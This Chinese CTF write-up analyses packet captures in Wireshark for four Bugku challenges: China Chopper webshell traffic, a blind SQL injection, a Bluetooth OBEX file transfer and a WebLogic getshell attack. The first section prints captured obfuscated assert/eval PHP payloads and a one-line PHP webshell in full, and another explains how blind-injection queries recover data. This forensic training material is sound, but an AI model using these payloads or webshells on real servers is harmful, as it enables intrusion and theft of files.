【CTF web入门第八篇】web入门

admin 2021年6月19日12:28:54评论157 views字数 4437阅读14分47秒阅读模式

以下全是分析类题目,每个都用到了wireshark。


bugku-ctf 第一题:中国菜刀

【CTF web入门第八篇】web入门

下载压缩包

在网站上下载下的是一个caodao.zip压缩包,解压缩得到caodao.pcapng文件。

【CTF web入门第八篇】web入门

使用wireshark打开caodao.pcapng,

 

点击搜索http

【CTF web入门第八篇】web入门

点击第一个http包,选择复制纯文本。

【CTF web入门第八篇】web入门

BBlE.?r@

7=P%-Pj123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0M6XFx3d3dyb290XFwnOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));");"));

去掉头尾,在尾部加上==,用BASE64解码

【CTF web入门第八篇】web入门

逐个分析。
看着$D应该是显示文件啥的!!
继续走!

第二个是个显示的文本,好像没啥,继续!

BBlE?x@

7=P#J)P,POST /3.php HTTP/1.1

X-Forwarded-For: 241.38.53.25

Referer: http://192.168.1.145/

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

Host: 192.168.1.145

Content-Length: 412

Cache-Control: no-cache

 

123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9J0M6XFx3d3dyb290XFwzLnBocCc7JFA9QGZvcGVuKCRGLCdyJyk7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));");"));

 

第三个:好像是显示3.php里的内容的。继续走!!
分析第4个http包:

【CTF web入门第八篇】web入门

同样的步骤

BlBE@|

7=PJ)#P@/HTTP/1.1 200 OK

Date: Mon, 27 Jun 2016 08:48:02 GMT

Server: Apache/2.2.22 (Win32) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 33

Content-Type: text/html

 

X@Y<?php eval($_POST[123]);?> X@Y

 

发现是php的一句话木马。
觉得应该离flag不远了!继续走:
第五个包:

BBlE,?@

7=PnR

PhPOST /3.php HTTP/1.1

X-Forwarded-For: 241.38.53.25

Content-Type: application/x-www-form-urlencoded

Referer: http://192.168.1.145/

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

Host: 192.168.1.145

Content-Length: 472

Cache-Control: no-cache

 

123=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9IkM6XFx3d3dyb290XFxmbGFnLnRhci5neiI7JGZwPUBmb3BlbigkRiwncicpO2lmKEBmZ2V0YygkZnApKXtAZmNsb3NlKCRmcCk7QHJlYWRmaWxlKCRGKTt9ZWxzZXtlY2hvKCdFUlJPUjovLyBDYW4gTm90IFJlYWQnKTt9O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));");"));

 

解码

【CTF web入门第八篇】web入门

发现是显示一个flag.tar.gz一个压缩包里面的东西,这个里面应该就是flag了。
继续分析最后一个!!

BlBEE

7=PnUP@HTTP/1.1 200 OK

Date: Mon, 27 Jun 2016 08:48:26 GMT

Server: Apache/2.2.22 (Win32) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 209

Content-Type: text/html

 

X@YwpWY

0.+['|

wACHnrda/Tp{Dt>v=ui[9YzG/opNGr:

}?swcR?YN*mej$)$f,iMxyS(X@Y

 

发现是一串看不懂的乱码!!
直接找到:直接右键显示分组字节:

 

【CTF web入门第八篇】web入门

【CTF web入门第八篇】web入门

最后解码改成压缩,开始一直点增加,最后就会出现flag!!!

【CTF web入门第八篇】web入门

得到:

key{8769fe393f2b998fa6a11afe2bfcd65e}


bugku-ctf 第二题:信息提取

【CTF web入门第八篇】web入门

下载下来用wireshark打开

【CTF web入门第八篇】web入门

只有http和tcp的包,我们只关心http包,所以我们在过滤中输入http,只显示http内容

粗略的看一下,结合题目的提示“sqlmap用过吗”,可以看出这是一个布尔盲注的过程,从sql注入检测,猜解数据库,表名...

一位一位的猜取flag,然后用二分法判断其ascii码的范围并最终确定这一位的值。

第806个包是读取flag第一位的数据包。

【CTF web入门第八篇】web入门

为了更明了的查看语句,可以导出对象查看

【CTF web入门第八篇】web入门

【CTF web入门第八篇】web入门

将其payload解码一下是这样的,判断其ascii码是否大于64

【CTF web入门第八篇】web入门

我们可以以64这个ascii码为一个字符的分界线,我们不需要看返回值,只需要往下看到下一个64就能判断ascii码是什么,我们以第一个字符为例,可以看到第一个字符判断的时候,先判断其是否大于64,后面又判断了是否大于96,说明这个字符肯定大于64,所以此时作比较的ascii码增加64的二分之一,即96,接着向下看,作比较的ascii码变成了80,说明这个字符小于96,所以大于64又小于96,继续向下分32的二分之一,即80,在接着向下看,作比较的ascii码变为了72,说明这个字符依然小于80,继续向下分16的二分之一,即72,继续向下看,作比较的ascii码变为了76,说明这个ascii码大于72,所以向上分8的二分之一,即76,继续向下看,作比较的ascii码变为了74,说明这个ascii码小于76,所以向下分4的二分之一,即74,继续向下看,作比较的ascii码变成了73,且下一个包变为了64,说明已经判断结束,因此大于72又不大于73,这个ascii码为73,对应的字符为I。这就是二分法。

第二个对比得出是83。

【CTF web入门第八篇】web入门

83—>S

以此类推

【CTF web入门第八篇】web入门

71—>G

【CTF web入门第八篇】web入门

123—>{

以此类推,其flag为ISG{BLind_SQl_InJEcTi0N_DeTEc***}(我建议还是自己做一下的好,哈哈)。本题需要一定的耐心和SQL注入基础,虽然没很绕,但是也是个体力活。



bugku-ctf 第三题:手机热点

【CTF web入门第八篇】web入门

先下载流量包,下载后还是wireshark打开,

【CTF web入门第八篇】web入门

嗯,陌生的数据包。。。

必应 “蓝牙传输协议”,即obex。

wireshark搜索obex用WireShark分析

【CTF web入门第八篇】web入门

【CTF web入门第八篇】web入门

传了一个“secret.rar”压缩包

选中

【CTF web入门第八篇】web入门

导出为x.rar,解压得到Flag

【CTF web入门第八篇】web入门

SYC{this_is_bluetooth}



bugku-ctf 第四题:weblogic

【CTF web入门第八篇】web入门

下载流量包,下载后还是wireshark打开

【CTF web入门第八篇】web入门

考点

weblogic 攻击流量审计。模拟了爆破weblogic登录密码,通过部署war包getshell,执行命令获取hostname的操作。

 

猜测黑客的攻击过程:

黑客有可能爆破了weblogic登录密码,获取到主机名hostname.

通过http协议过滤,ctrl+f搜索选择字符串、分组字节流,输入hostname。

【CTF web入门第八篇】web入门

通过检索,找到了两个包 no.658 和no.662

右键选择追踪流-->TCP流

【CTF web入门第八篇】web入门

显示和保存数据为UTF-8,查找hostname,查找~

【CTF web入门第八篇】web入门

注意:题目有提示哦~

Tip:主机名为十六进制。

【CTF web入门第八篇】web入门

flag格式:flag{}

试试 flag{6ad4c5a09043} 

本文始发于微信公众号(LemonSec):【CTF web入门第八篇】web入门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月19日12:28:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CTF web入门第八篇】web入门https://cn-sec.com/archives/301225.html

发表评论

匿名网友 填写信息